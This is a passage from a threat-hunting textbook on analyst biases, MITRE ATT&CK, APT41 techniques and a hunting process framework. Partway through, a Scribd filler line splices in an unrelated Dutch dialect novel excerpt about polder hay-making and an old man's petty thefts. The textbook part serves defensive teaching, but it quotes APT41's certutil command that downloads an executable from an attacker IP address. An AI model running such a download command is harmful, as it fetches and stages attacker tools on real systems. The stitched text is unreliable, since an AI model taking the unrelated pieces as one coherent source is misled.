should not fall into confirmation bias by ignoring or discarding
information or suggestions contradicting their hypothesis. This will save
them time and ensure that their threat hunts are relevant and optimal and
that the outcome of the hypothesis testing reflects the actual situation.
Present bias: refers to choosing a smaller present reward that is
immediate than waiting for a more significant future one in a trade-off
situation. Threat hunters should not settle for the first evidence they
uncover. Instead, they should expand the scope of the hunt to uncover
the extent of the threat.
Overconfidence bias: refers to overestimating one's actual ability to
perform a task successfully. Threat hunters should continuously seek to
gain more experience and knowledge to be accurately self-confident
rather than overestimate their capabilities. The overconfidence bias
might stop threat hunters from seeking advice or support from other
experienced colleagues or external subject matter experts, thinking they
 know all.

At the beginning of the chapter, we referred to MITRE ATT&CK in our

threat hunt play that addresses the threat scenario. For example, we
referenced MITRE ATT&CK in the background section and a couple of
MITRE ATT&CK techniques (T1059.001 and T1059.003) under the threat
techniques. What is MITRE ATT&CK, and how useful is it to threat hunters?
We explore this in the next section.

2.6 MITRE ATT&CK

MITRE ATT&CK (https://attack.mitre.org) stands for MITRE Adversarial
Tactics, Techniques, and Common Knowledge (ATT&CK). MITRE
ATT&CK is a popular reference for creating security monitoring detection
rules and driving threat hunting hypotheses. It provides comprehensive
matrices of attack and threat tactics and techniques that are updated twice a
year. Version 10, published in October 2021, has four matrices: Enterprise,
Mobile, Industrial Control System, and Containers.

Version 10 of MITRE ATT&CK Enterprise

(https://attack.mitre.org/resources/updates/updates-october-2021) contains 14
Tactics, 188 Techniques, 379 Sub-techniques and 129 Groups. The 14 tactics
are Reconnaissance, Resource Development, Initial Access, Execution,
Persistence, Privilege Escalation, Defense Evasion, Credential, Access,
Discovery, Lateral, Movement, Collection, Command and Control,
Exfiltration and Impact.

ATT&CK describes the following elements:

Tactics: represent the "why" of an ATT&CK technique or sub-

technique. It is the adversary's tactical goal, i.e., the reason for
performing an action. For example, exfiltrating data.
Techniques: represent "how" an adversary achieves a tactical goal by
performing an action. For example, an adversary may dump credentials
to achieve credential access. The threat hunt play example includes
technique number T1059, command and scripting interpreter, under the
execution tactic.
 Sub-techniques: a specific description of the adversarial behavior used
to achieve a goal. They describe behavior at a lower level than a
technique. The threat hunt play example includes two sub-techniques:
T1059.001, command and scripting interpreter: PowerShell, and
T1059.003, Command and Scripting Interpreter: Windows Command
Shell.
Procedures: the specific implementation the adversary uses for
techniques or sub-techniques. The threat hunt play example includes a
procedure per sub-technique. For example, APT41 leveraged
PowerShell to deploy malware families in victims’ environments is used
for Command and Scripting Interpreter: PowerShell sub-technique and
used cmd.exe /c to execute commands on remote machines. APT41
used a batch file to install persistence for the Cobalt Strike BEACON
loader.

The threat intelligence community tracks threat actors and, in many cases,
maps their activities to the MITRE ATT&CK tactics and techniques.
Organizations and threat hunters can use this information to plan their hunts.
For example, APT41 (Mandiant - https://www.mandiant.com/resources/apt-
groups) is a group that is also known as Wicked Panda (CrowdStrike -
https://adversary.crowdstrike.com/en-US/adversary/wicked-panda), Group 72
(Cisco Talos - https://blogs.cisco.com/security/talos/threat-spotlight-group-
72) and BRONZE ATLAS (SecureWorks -
https://www.secureworks.com/research/threat-profiles/bronze-atlas.)

Threat hunters can use the MITRE ATT&CK as a starting point to investigate
the group, understanding and visualizing the known techniques and
procedures that the group deploys.

Note

MITRE ATT&CK is updated twice a year; therefore, for recent information

on threat actor activities, the organization should have access to threat
intelligence research services delivered by an internal threat intelligence team
or outsourced to reliable threat intelligence providers.

In some cases, and depending on the organization's maturity, business, and

size, the threat hunter might perform the role of the threat intelligence
analyst.

Figure 2.4, generated using the Enterprise MITRE ATT&CK Navigator

(https://mitre-attack.github.io/attack-
navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0096%2FG00
enterprise-layer.json), shows the tactics and techniques relevant to APT41
highlighted in blue.

Figure 2.4 MITRE ATT&ACK Tactics and Techniques for APT41

To conduct their malicious activities, the threat group of interest, APT41,

deploys many techniques and tools. According to Mandiant
(https://www.mandiant.com/resources/apt-groups), APT41 has used at least
46 different code families and tools to target organizations in 14 countries.
APT41 often relies on spear-phishing emails with attachments such as
compiled HTML (.chm) files to initially compromise their victims. Once
inside, APT41 can leverage more sophisticated tactics, techniques and
procedures (TTPs) to deploy additional malware.

If identified as one of the threat actors of interest, the security monitoring and
threat hunting teams would look for APT41 tactics, techniques, and tools
commonly used by the group. Threat hunters, in particular, would establish
hypotheses around the existence of traces of APT41 activities in the network
and search for the tactics and tools used by the group to prove the hypotheses.

MITRE ATT&CK website (https://attack.mitre.org/groups/G0096) lists

techniques and tools used by the group. The list can be used as a reference to
create or tune detection rules and build threat hunting hypotheses. For
example, the threat hunter can create a hypothesis supported by searching for
"T1105 Ingress Tool Transfer", a MITRE ATT&CK tactic exploited by the
group. The APT41 group has used certutil, a built-in Windows program, to
download additional files during an intrusion. The following shows an
example of how the group used the certutil command-line tool to download
an executable file, 2.exe, during an attack uncovered by Mandiant
(https://www.mandiant.com/resources/apt41-initiates-global-intrusion-
campaign-using-multiple-exploits).
certutil -urlcache -split -f http://91.208.184[.]78/2.exe

Including all the APT41 techniques in a single hunt play would not be
practical. Some techniques are not relevant to the environment, while others
are. You might end up combining the techniques that apply to the
environment based on the tactic they call under and procedures used. In our
threat hunt play example, we are looking into techniques in which
PowerShell has been used to execute the threat.

Building and operating a structured threat hunt practice involves more than
creating hunting plays. A framework that describes how to manage a hunting
practice is needed. Let us look into the topic of building a framework for
threat hunting.
2.7 Frameworks
In general, a framework is a structure that outlines the organization of a
system (in our case, the threat hunting practice) and facilitates the proper
arrangement of components that the framework identifies.

2.7.1 Scenario

Imagine you are asked to develop the outline of a threat hunting framework
to drive a structured threat hunting practice. What areas would the framework
cover, and what level of details would you include?

2.7.2 Threat Hunting Framework

A standard threat hunting framework covers the following areas:

Definition of threat hunting

Threat hunting is a human-centric security practice that takes a proactive

approach to uncover threats that evaded detection tools such as automated,
rule- and signature-based security systems or threats that have been detected
but dismissed or undermined by humans.

Definition of important threat hunting concepts

A hypothesis is a proposition that is consistent with known data but has

been neither verified nor shown to be false.
Situational awareness refers to understanding the business, the
supporting technology environment and the internal and external cyber
threats associated with this environment.
A threat actor refers to a person, a group or an organization driven by
different motives to conduct malicious intents.

The threat hunting process

We need document the threat hunting process, such as the example that will
shortly follow. The threat hunting process documents the following: title,
description, owner, roles involved, resources, triggers, exit criteria and a
detailed workflow. Let us look at the example.

Title: Structured threat hunting process

Description: Unlike alert-driven investigations, structured threat
hunting starts with identifying threats followed by a hypothesis to verify
(hypothesis-driven investigation). A hunt starts with "a what-if
question", followed by an initial lead/clue, but then hunters take many
twists and turns. The threat hunting process describes the following
phases:
Preparation
Execution
Communication
Owner: Threat Hunter (or the threat hunting manager in the case of
large organizations)
Roles involved:
The threat intelligence analyst provides compiled reports that
describe relevant threats for hunters to track down
The threat hunter prepares, executes, and optimizes threat hunts
The threat hunter hands over the incident to the incident response
team when proving the hypothesis and/or uncovering other threats
during a threat hunt
The platform engineer addresses questions and issues in relation to
systems used by the hunter
Resources:
Threat hunt play template
Threat hunt report template
Threat hunt playbook
Systems and Tools: List of systems and tools used by hunters to
conduct their hunt expeditions, such as ones used for:
Storing, searching and correlating events
Executing queries on endpoints
Capturing and retrieving network flows
Capturing packets
Sandboxing of artifacts (e.g. file and URL)
 Managing threat intelligence
Managing incident cases
Triggers:
Threat intelligence information
Threat modeling
Red/purple team exercise
Analyst of past cyber security incidents
Exit Criteria:
It is not possible for the hunter to gain access to data required for
the threat hunt play
Reporting an incident to the incident response team based on
proving the hypothesis
No threats were found during a threat hunt
Workflow:
Preparation: This phase, shown in Figure 2.5, involves the
preparation work, which involves identifying the triggering events,
deciding if a new hunt would be introduced, creating the play and
ensuring that the required data and tools for the hunt are available
and suitable.

Figure 2.5 Threat Hunting Process – Preparation Phase

 Execution: This phase, shown in Figure 2.6, involves running the
threat hunt expedition, uncovering the threat and its scope and
creating an incident ticket if the hypothesis is proven.

Figure 2.6 Threat Hunting Process – Execution Phase

 Communication: this phase, shown in Figure 2.7, involves
documenting the threat hunt expedition and handing over the
findings to the corresponding teams: security monitoring, threat
intelligence and vulnerability management.

Figure 2.7 Threat Hunting Process – Communication Phase

Following a process ensures that threat hunts are efficient, thorough, and
successful. The above breaks down the steps of the high-level threat hunting
process presented in Chapter 1 and shown in Figure 2.8.

Figure 2.8 High-Level Threat Hunting Process

When documenting a process, you can use the following structure for a
process template:

Title: The title of the process

Description: The purpose and scope of the process
Roles: The owner of the process as well as the job roles responsible for
executing the process
Resources: The resources (such as technologies and templates) that are
required to execute the process
Process trigger(s): The event or series of events that must have
occurred to trigger the process
Exist criteria: The conditions for the process to be considered complete
Workflow: Describes the steps and assigns roles responsible for
executing the steps

Note

The threat hunting process can be much more involving, especially the
execution phase when multiple hunters are involved in conducting and
supporting large-scale threat hunting expeditions.

Threat hunting role and responsibilities

The Responsible, Accountable, Consulted and Informed (RACI) model in

Figure 2.9 shows a set of tasks mapped to different roles in security
operations, including the role of threat hunting. The list of tasks represents
activities that relate directly or indirectly to threat hunting. For example,
onboarding a data source is not the responsibility of a threat hunter role, but
then need to be informed since not having the required data available in a
suitable format would hinder their work. On the other hand, it is the
responsibility of threat hunters to identify and request the onboarding of data
sources they need in case the system owner or the platform administrator did
not onboard them successfully.

Figure 2.9 Threat Hunting RACI Model

Another random document with
no related content on Scribd:
sjorden ze nog, tot Dirk, in zwaren knoop, ’t touw-end
om wagenkant vastrukte. Hijgend en blazend, paf van
smoorhitte, die als wiegelend vuur op hun kleeren
bleef zengen, en hun zonnebronzige zweetkoppen
rood-vlekkig, bevlamd van inspanning, onkenbaar
verwrong, stonden de kerels achter ’t krat van den
hoogen wagen, waar de wind nu geen vat meer op
had.—

Stom even keken ze voor zich uit.—Toen, met ’n

forschen ruk boorde Kees de steek vork diep in ’t hooi.

—’n Gos-meroakel daa-tie stoan ’tmet.… kaik.… wâ

lailek die skaif hangt!..

Dirk kroop op ’t voorkrat, klom op z’n bankje,

ingedoken [228]onder ’t berghooge goudhooi, z’n
schonken en kop òverhuivend. In beukerenden ruk en
pracht-spannenden spierzwel, de pooten pezig
gekromd, de flanken gestrekt, kop in snuiving
laaggebukt, hoefklakkerde ’t paard op den grintdijk
áán. In waggel kraak-hortte de wagen voort van den
dijk.

Kees en Ouë Gerrit hingen zich aan de binten van ’t

achterkrat, met armen vastgehaakt, half-sleurend
langs spanrand en touwkruis, om den berg te stuiten
in z’n snel-sullenden gang van schuinen dijk. Zoo
hobbelde de wagen voort, angstig scheef-hellend den
straatweg op, klaar, om bij ’n dommen zwenk neer te
smakken, breed-uit op gloei-blinkenden klinkerweg
van polder.—
 [Inhoud]

III.

In den middag stonden de hooiwagens weer leeg op

den dijk. De wind was uitgevlaagd, brieste nu koeler in
den zwijmenden polder, en zilver wolkspel, veerig
blank, doorpluimde in ontzaglijke zwierlijn, ’t
hemelruim. Achter, bij horizon, stapelden wolktronen,
paars en violet in dampig en vochtig goudlicht. Van
alle kanten uit, achter dammen, dijken en paden,
waggelden de hooiwagens weg, als ’n zwoegend
versleep van duinen.

Gelijk ’n blinkende witte baan, lag gloeizanderige

klinkerweg naakt te blakeren tusschen ’t groen. ’n
Adem van zeezoelte koelde soms over ’t land en in
mistig violet slankten de dorpstorentjes op paarse kim.
Wijde middagrust, zwijmelloomde en suizelde over
klaverveld en bouwgrond. Meer bijeengedromd in de
middaghitte groepten de droomrige trage koetjes in
vacht-pracht, en smijige huidplooiing. Wat
watermolentjes wiekerden, wìekerden, en bestoven
van luwe dampen, schitterden de slooten of effenden
met kroos, in dof prachtgroen, pasteltintig omstreeld
van innig licht.—

Om zeven uur nog stonden Dirk en Kees den laatsten

wagen op te laden, nu vlugger en rustiger werkend, in
den [229]koelenden luchtstroom en stillen aangloei van
zonnerood, tusschen den avondlijken val van ritslige
zuchten en polderstilte, eindloos.—
 Luidlooze groei van schaduwleven was over ’t land
getrokken. Gebroken kleurval dampte òp in wazig
zonnerood. Graasgeluid van koeien raspte zacht door
de weien en blaatgekerm klaagde éven over dijken
áán, als ver kindergeween.

In pastoralen zang verklonken van heel vèr, soms

even, menschenstemmen vaaglijk, en hoog van
hooiwagens, door den avondrooden polder. En
roerloos, de weien verklankten de werkersstemmen
als zang in den avondval.

Kweelig vogelgekwinkel, zacht als in den ochtend,

jubelde rond en lichte muschpiepjes stipten ongedurig
nog blanke dag-geruchtjes tusschen oneindige lucht
en vlakte.—In ’t westen zwierden blank-beschuimde
wolkjes, als ’n vlucht zilvermeeuwen en blanke tortels,
verdwaalde zwerm in zonnedaal.

Goud-geel en rood omvloeide ’t stedeke Wiereland in

zomeravondbrand, met z’n havenwoel, schepen,
kleurig lichtspel, purperglanzig achter verren
boomendrom en molen.

Huisjes, met oud-rood en hel vurig dak, walmden in

laten gloed, in wolkerig avondgoud, bij enkele hoeken,
in zacht-wondren brand de krotjes verguldend als
blinkende kluistertjes.—

’t Vlammenrood van zomeravond licht-baande in

vervige vegen door ’n warrel van kleine huisjes,
dwars-scheef, krom, verweerd en gebroken, toch van
verre saàmgekringd, met hun geelbeokerde geveltjes
en glans-raampjes, pracht-tooverig aangegloeid in ’t
 zonnerood. Aan één kant van polder naar Lemper,
rijden de hooischelven òp in wonder-stille, roode
tooverij van magisch vuur.—’t Hooi sfeerde rood-
omwiegeld in angstig-heiligen gloed. Violet kropen de
slagschaduwen als gedoofd vuur onder aan de
schelven, met de graszee in laatste doorzonning er
onder, vreemdgeel-groen nu, in zonnedaal. Rij aan rij,
de hooischelven wonderden dáár in de roode
zonnetooverij, en angstiger in doodskruip klom
schaduw-violet aan één zij òp, doofde ’t hooiblond, ’t
goudgegloei, ’t gras, in langzamen stijg. [230]

Boven ’t stedeke, ’n zicht ver, stond de hemel in hel-

rooien brand. Wolkenburchten met goudbegloeide
boogbruggen en rood gegloeide pijlers, dreven in
geel-okerige zee van licht. Vlammenpoorten boogden
hoog, waaronder uitholden paardestoeten en
ruitergestalten in rooden vlammenvlucht, toeterend op
helkoperen trompetten, ’t vuur uit de avond-hemelen
samen.

Ze renden, ze draafden áán, beschuimd, bestoven,

ombeefd van gloed, één draf van renners uit ’t
vlammenrijk van rooden avondbrand, naar de
burchten, over gouden bruggen, door kleurige poorten
en zilver-groene hallen. In roodgouden damp ijlden
hun rossen, met snuivende trilneuzen, door ruïne-
rijken van vonkend violet.

Vanen van vuur en gloed in nevelspel, wapperden uit,

onder brandende vlammenpoorten en telkens in
heviger lichttuimel stortten afgebrande roode balken
 en steenen met knetter en vonkspat, ’t paarsblauwe
ruim in, uitgedoofd doodstil vergrijzend.—

Zoo, ’t hemelspel dreef boven stedeke,

zomeravondbrand van polder, geluidlooze ren en
fonkelende klaroening van paarden en ruiters, uit ’t
vuur naar de burchten, door gloed en damp
voortstuwend in drom, en tòch stilstaand in aarzeling.
Eindelijk versteende de drom, apotheose-stoet
verbleekend in oranje naar paarse mist, de
paardkoppen alléén nog vurig besinteld, in oogstaar;
nog éven te zien de hijgende snuifneuzen, in
nerveuzen angst-tril. En boven hun koppen,
gloeisperen van vergrauwende renners, dwars
geheven naar ’t vlammenlicht, in starre houding, grijs-
vaag wègdoovend in nevel van paars.—

Onder den wolkenden aarzeldrom, ’t stedeke

avondgloorde in stiller rood, heilig van gloed. Dakjes-
wemel, in zonnezinking verteerde in glansrood; blauw
geluik, groene deurtjes en venstertjes vergloeiden
èven zacht lichtstervend. Ruitjes in rooden gloor
vervlamden brand, stillen heiligen brand, en helrood,
en purper en zilverleiïg gloeiden de daakjes, lijnden
vervloeiend in ’t wisselend hemelbrio bòven
havenboomen; [231]boomen die groeiden, reuzig tegen
’t late licht in. Wasem van tinten dampte al lager uit
òver ’t stedeke en bleekgoud verstierf de havenwoel in
eindelooze stilte, doorruischt van avondval.

De polder ving laatsten gloed, in blonden aarglans van

rogge. Halmen glimmerden en dauwig lichtwaas
dampte over het stervende, verstillende land.—
De hooischelven stonden uitgegloeid in paarse dofte
en ’t gras weifelde geel-teer onder een zwijmel van
hooilucht en bloemzoet.

Vesperklokjes luidden lichtelijk in eindlooze

teerderheid, als zilverende koorgalm van angelus-
stemmen. En héél ver af, aan den schemerenden
cirkelrand van polderkom, de dorpjes vereenzaamden,
verschuchterden in bleek grijs. ’t Vee, loom plassend
in nevelzee, verstipte in overgrauwende dampigheid,
al kleiner.

Wat hooiwagens vèr op dijk, schommelden, dof in

avondlijk mistpaarsen landdamp. Zoete geuren uit de
koelende aarde zwijmden òp, wiegelden rond.
Tjilpertjes, heel zacht, in dooréén jubelenden piep,
vlogen áán en wèg door ’t gras, doorstreepten ’t
avondland met zangetjes ijl, zilverend geneurie van
vedels en aëoliens.—

Al donkerder verzonk de polder, vereenzaamd in

nachteduister.—

Krekel-dreunzang melodiëerde overal en nergens,

afgebroken avondklanken. Windefluister ruischte rond,
vertelde wat in ontroerden suizel van nachtegloor, en
van ’t stedeke woeien áán zwakke geruchten, brekend
op de deining van polderrust, avondstilte op rhytmus
van eeuwigheid gedragen.

Avondgeruchten vaag en wezenloos verzwierven in ’t

duistere weide-rond, en al zachter fluister trilde over
donkerend aarde-groen.—Zachter verstierf ’t
 ruischgebed van riet in de plassen, de weeke
heimelijk-teere ritsel van aren en halmen.

En dichter op de aarde daalde de hemel, al lager,

lager, grijs-nevelig vervloeiend met ’t duisterend
weiegroen, paars-teer, doorsidderd van avondheilige
stilte. [232]

Ver rijk van godswijde stilte in mistig avondgerucht,

éven doorweend van koe-loei, heel vèr, uit donkere
wei aanklankend, omruischt weer van rietzang en
halmenfluister.—

En stil, ontzettend in stilte, aan de kim, ging opstand

van stomme silhouetten, schaduwen van werkers,
donkere nabeelden van zwoeg, duister versluip van
menschen, stemmeloos verdwijnend in ’t avondpaars
van den onmeetlijken poldernacht. [233]

[Inhoud]
 ZESDE HOOFDSTUK.

Ouë Gerrit liep rond in z’n tuin, achter ’t erf, kijkend

naar de boonen. Op een be-boomd hoekje stonden
Kees en Dirk in zondagsplunje te koekeloeren naar de
bessen en frambroze-struiken. Stijfjes in zwart kolbert,
gouden horlogeketting op zondags-vest, stapte Dirk
voort naast Kees, die met schunnig gelapte broek en
in groenig verkleurde pijjekker, meeliep.—Ouë Gerrit
strompelde behagelijk in zondagsche rustzaligheid
rond, bekeek z’n boeltje met genot. De aardbeien
waren nogal gegaan. Dirk had met ’m afgerekend,
schraperig uitgeteld, en de zuip, dacht ie zoo, was wel
minder bij ’m geworden. ’t Geld had Guurt muurvast,
beter dan hij zelf. Want allang had ie gemerkt dat Dirk,
de snauwende stille Dirk, met hèm liever afrekende,
dan met z’n zus, die mirakels op de centjes keek, als
vroeger d’r suffe moeder.

Woàr ’t tug nou met ’t waif noar toe mos?.. hoho!.. da

wist tie puur sellefers nie! Dà wier d’r al suffer en
suffer! Dà wist ie sellefers moar hallef. Wá’ da’ nou
sain sou.. eenmoal … andermoal!.… moar de
oarebaitjes gonge goed en de boone stonge
prèchtig.… Die boone! die moste sain vast ’t joar
goedmoàke. Die laileke dokter Troost, die bemoeial,
ho! ho! had sain sait.. veur wâ hep je nie aldegoar
oarebaaie?.. Moar da sou ie denke! die
kabbeloebeloap!.… àl je f’rdienste op één risiko sette!
Wie waa’s d’r soò daas?.… Aa’s de boone moar goed
gonge!… en de kerels d’r tuusbrochte wa’ ontvange
 wier.… Nou gòng d’r Piet de heùle weuk noar stad.…
Da’ gong veul beterder! die beskouwde d’r soms de
half meer aa’s Dirk! En aa’s d’r dan Nofember dokt
most worde.. erais kaike of dá’ [234]ie d’r kwam dî joar,
al had ie skuld en skuld en nog erais skuld. Al stong ie
d’r gloeiend lailek veur! Moar wà nou? most ie.. most
ie op haide.. seure?.. op haide? d’r was nou rùst.. rùst,
nou most ie kaike, kaike!

Dirk en Kees drentelden ’m voorbij. Ze vonden ’t

lekker de kerels, in den snikheeten Zondagochtend,
stil en rustzalig lui, op ’t land, zoo tusschen d’r eigen
gewas en opgeknapten boel te slenteren.—Te
koekeloeren naar de teelt; alles zien wat noodig was,
en toch geen hand uitsteken.—Zoo leek ’t puur genot
adem te halen, midden in de landgeuren en ’t
zonnegoud.

De aardbei was in z’n grootsten haal gedaan. Er bleef

nog wel elken ochtend en avond wat te manden, maar
nu weer gloeiden de bessen òp en de kruisbessen
zwollen goud, en de dauw-doffe frambozen met hun
heimweeïgen geur van rozenzoet, purperden overal
aan de struiken, tusschen ’t groen. Ze hadden ’n
mooien vruchtenhoek, waar zorgelijk rond gewied
was. Voor den kerkgang van Ouë Gerrit, wouên ze
met d’r drieën nog ’n straatje omslenteren. Dirk had al
wat gebromd. De Ouë gooide z’n vuile jekker uit, liet
zich door Guurt z’n spannend-plooiïge zwart-
lakensche jas brengen. Heerig, met groenig
fantaziehoedje op z’n zilveren krullen, in enge jas die
stramde onder z’n armen, en over borst, kwam ie ’t erf
af, stijfgebarend en harkerig loopend, alsof z’n tikker
 bij elken tred kòn scheuren. Ze rookten alle drie,
knepen kwijl-dotterige punten aan hun sigaren en de
groenige morsige gebarsten handen, vereelt en
doorpeesd in grauw valen tint van aardewroet,
klauwden stijfjes onder de zondagsmouwen uit. Drie
op ’t rijtje, pas aan pas, ging de slenter door
Droogeweg, achterhoekschen tuin-wijk van Wiereland.
—

Aan twee kanten, langs Droogeweg-laan, goud-fel

doorzond, groende tuinderij op duingrond, hobbelig en
hellend, hier en daar doorscheurd van woest-
zanderige, kale brokken.—Jubel-blauwend straalde de
hemel uit en ’t zilvergrijs van wilgen en beukengroen
langs de laankanten, trilde in feilen lichtstroom. Stil lag
de zondag-weg, ’t smalle rood-aarden pad
doorsprankeld van zomervuur en zonnevonken.—Aan
weerszij, diep naar [235]achter, de zonnige goudgroen
beflonkerde moestuinen en boomgaarden, tusschen
den greppeligen goud-zanderig doorscheurden
duingrond, laag-golvend en vloeiend-teer van lijn,
waar naakt gegroeide wortelkronkels van krom-
gevloekte wilgen klauwden, onder struik-woest gewas
uit. Langs de heele laan, zonnigden heet, de
tuindershoevetjes, klein en hel-roodvlammig bedakt,
tusschen diep-inloopende oprijpaadjes die
paarszandig gloeiden tegen goudzand van duindal. ’t
Lage duin vergleed daar prachtig in z’n golvend
vrouwelijk-fijne lijn-rondingen, svelt en teer,
waarboven wijd hemelblauw jubelde, zee-wijd, boven
groen, groen, àl groen, bessenrood en purper.—
 Al de oprijlaantjes vóór zongloeiende hoeven
kronkelden daar aan twee kanten, hoog begroeid met
wilden cier van struik en bloem, waarachter de blaker-
geveltjes in zondagsrust heiligden, fel gelukkig
lichtjubelend, toch peinzend, doodrustig in
zomerglorie.

Laat-Juli daverde snikhitte en zonnegoud op ’t dicht

bijéén gegroeide teeltgroen, laaide door boomen,
struikwild en bloemgroepjes, in kleurigen gloed. Achter
en tusschen ’t groen, ’t godlijke stralende jubelgroen,
overal, van boomen en gras, gewas en duinmos,
scholen de hoevetjes in een blank-gouden wasem,
omsterd van gele en roode bloemselen;
goudsbloemen en dampende violier, sneèuw-fel wit,
en al-gloeiend duizendschoon. Er jubelde rood en
hoog-paars in de oprijlaantjes, in hellen blaker van
zonnigheid. En ’t bebermde golfduin in teer-
vrouwelijke glooilijn, omdonsd van groene koestering,
trilde overstort van tooverig zomervuur. ’t Vonkte langs
de greppels, achter de huisjes, geel en goud, papaver-
vuur en hel-paars boekettig.—

Skabiosa’s en blanke zilveren winden, reine

sneeuwvaasjes, lichtten in ’t groen gestruik tusschen
gras en wilden bloembloei. Heel diep, de zilver-blanke,
de goud-blanke, de schitter-sneeuwige winde dan hier
dan daar, sneeuwden boven ’t prachtgroen, roerloos
rein als besneeuwde hostie-kelkjes.—

Stàp-stàp, langzaam kuierden de mannen langs de

tuinen, op ’t rood-zandige pad, zwijgend, ieder wèg in
eigen denk-dommel. [236]Kees, stil en mijmerend,
dacht aan Wimpie, huilde en smoorde woede-drift, dat
’t ventje niet bij ’m was. En Dirk, al heeter op de
meiden van Grint, was blij dat ie nog wat duiten had
achtergehouën voor de kermis in half Augustus, om ze
te trakteeren. Toch jeukten ’m de handen, als ie dacht
aan lammen neef Willem, die ’m daar altijd dwars zat
met de lekkere Geert.—

Ouë Gerrit dommelde voort, onrustig zich voelend,

naast z’n zoons. Hij was ’t nou eenmaal gewend,
Zondags vóór de kerk, alleen ’n slentertje te maken.
Dan was ’r nog altijd wel wat voor ’m te gannefen.
Kleinigheidjes wel, maar dat kon nou eenmaal zomers
niet anders, bij zooveel vertier en zooveel kijkgrage
oogen. En nou was ie weer gedwarsboomd door de
kijkende kerels, die hij niet had willen weigeren ’n
hoekje om te maken, en bij wie ’t toch wel uitloopen
zou op ’n borrel.

Nou kregelde ’t over alles in ’m. Eerst om z’n

lamlendig sukkelwijf, dat maar vrat en zoop en duiten
kostte en geen poot meer uitsteken kòn; dat daar als
’n lijk in huis verslonk op d’r stoel, in ’n hoekje bij den
stal. Hij begreep maar niet waarom dat wijf leven
bleef.… ’n Stelletje rommelbeenen en tangen zonder
vleesch, koffie zuipend, met d’r muffen smoel open en
en dicht, en kwijlen, niks dan kwijlen. En ’t besef van
geen minuut! of zou ze nou altoos vigeleeren op hèm?
Dan kregelde ’t in ’m dat ie bij den fotograaf tegenover
’t plaatsje van Bekkema waar ie de blommetjes
nakeek,—dat ie bij dien vent ’n stommen streek had
uitgehaald.—Daar dronk ie tegen elf, nou altijd ’n
lekker bakkie koffie. Nou had ie bij dien kerel, ’n heel
mooi, fonkelnieuw goudtientje in ’n doosje zien liggen,
zoo losjes maar, en dat had ie netjes gepiept! ’t Eerst
van z’n heele leven dat ie geld gannefte. ’t Had ook
zoo geglommen, zoo prachtig uitgeblonken, dat ie d’r
geen oog van af wist te houen. Nee, hij had gevoeld,
dadelijk, dat hij dat goudtientje moèst nemen, al kostte
’t wat ’t kostte. Drie dagen later, na ’t gannefen had ie
plots gemerkt, dat de fotograaf ’m niet meer zoo gul
toesprak, en geen afporterteersel van z’n kop meer
maakte. Hij had gezien, heel sluwigjes, uit alderlei
kleine trekjes en zegseltjes, dat [237]de man ’m
wantrouwde, nooit meer alleen liet in ’t atelier, òf àls ie
’t eens deed, altijd de deur van z’n donker kamertje
sloot. Dat maakte ’m bang, onrustig, al wou ie dien
angst voor zich zelf soms verstoppen. Hij tastte nou in
vage benauwing.… òf ie den vent argwaan had
gegeven, al begreep ie niet waarom de man hèm
durfde te verdenken; hèm met z’n grijzen kop, z’n
besten naam, z’n lange woon?—Maar d’r was nog
meer, nog méér, waarover ie kregelde. Hij had twee
regels bollen gestolen, uitgegraven uit den grond bij
Bukkus, vlak achter zijn tuin.…

’t Jonge, dá’ waa’s d’r ’n nachie weest! ho-ho! Moàr

hai had se tùg … heul selsoàme bolle! Veur da’ mòst,
most ie juistig hewwe!.. Eéne regel.… van ’n poar
honderd pop!.. hoho!.… Moar wâ had ie d’ran? In
kelder gonge se wègrotte.. ’t gouwestukkie lai ’r
prêchtig! prèchtig! t’met òp de lepeltjes! Moar die
bolle? was niks gedaan!.… Doar leeë sullie hoho! wâ
had t’ie d’ran? ’t Was eerst moar lekker, salig weest,
dâ tie soo’n raikdom in ’t kluissie had.. sukke dure
snukkers! somoar ganneft! En se terugkwakke, nee da
kon ie tug ook nie van s’n aige f’rkraige.

Wa’ hadde sullie ’n heerejesis-hooge herrie moakt op

de ploats! Nou waa’s ’t alleweer soo wait hain!.…
hoho! moar toen! De pelisie!.. as daas hep sai d’r rond
spookt! En klage! klage! dat Bukkus dêe, teuge sain …
Da was d’r puur genot-en-weust. Beurde nie veul, dâ
d’r soo moar stole wier! Moar nou was ’t lol weust
alewèl.—Toen gonge se sain toeskreeuwe dáá ’t
skrikkelik, gruwelik waa’s.. da’ se de vent-en-moste
hange.—En hai.. s’n bakkes in plooi, stroef s’n
aigenste test an ’t skudde en meevloeke.. daa ’t ’n-en-
skande waas.. O! barstte had ie kent van genot, van
salighait soo. En de fint sain an ’t spuge, s’n aige van
malkoar, skreeuwe van drift.. En hai bromme in s’n
aige.. da’ hai wist woar se leeë, leeë, juustemint op dâ
stonde, dâ de fint sain d’r om-en-huilde!… En heel
Wiereland waa’s d’r in opstand, ’n relletje, van viere en
vaife en nie genog. Da’ sou die t’met nooit-nie f’rgaite!
Hai de heule santekroam doar stilletjes legge.… soo
stilletjes.… die meroakel-dure bolle.… die [238]moar
niks saie.… en dan sóó de heule boel veur je aige
sien hainholle en rondsnorre en soeke en skreeuwe
en skreie aa’s skoape! En hai an ’t bekloage, da’ tie
s’n aige stem hoore gòng, dá’ tie effe skrok, f’rbluft
stong van s’n aige valsighaid, moar tug weer lachte
van genot, salig genot.… omdá’ hai se had.… vlàk bai
sain. Enne.. da’ tie soo in sain hande naime kòn, a’s
tie wou, haì, woar de heule ploas daas van waa’s.. en
niks niemand van te begraipe wist. ’t Was d’r ’n salig
genot weust!.… Moar t’jonge hai most tug oppasse.…
’t Waif van sain kon d’r wel figelaire.… van waige ’t
 een en aêr.… tjonge.… da’ gong so wait.… hoho!
ongelukke binne kwaje kanse?… eenmoal
andermoal … dâ kon d’r in kluit-en-loope.. Aa’s da’
waif d’r aige moar nie stommetje sai.… allainig om
sain te beuke.… Moar.… moar hep de dokter nie
fermail sait aa’s da’ se d’r netuurlike f’rstand veur
alletait kwait leek? Wel ja! huhu! da’ waa’s d’r t’met ’n
ellendig-goeie woarskufing! hee?

De twee dokters saie t’met allebai eenderlai! Dan most

ie s’n aige nie soo moar van stuur moake!.… hoho!
Moar aa’s tie goed keek, waa’s d’r dan nie wat an
Kees? an s’n kaike? Had die sàin nou nie in de goate?
Heere kristis wa had die.. veurige weuk,.… èlleke
nacht ’n angst uitstoan? Ieder keer docht ie soo
laifendig Kees veur s’n lampies te sien. En op dag sag
ie Kees moar alletait op sàin loere! En gain woord da’
de fint sai! gain stom woord! En aa’s tie dan, uit angst
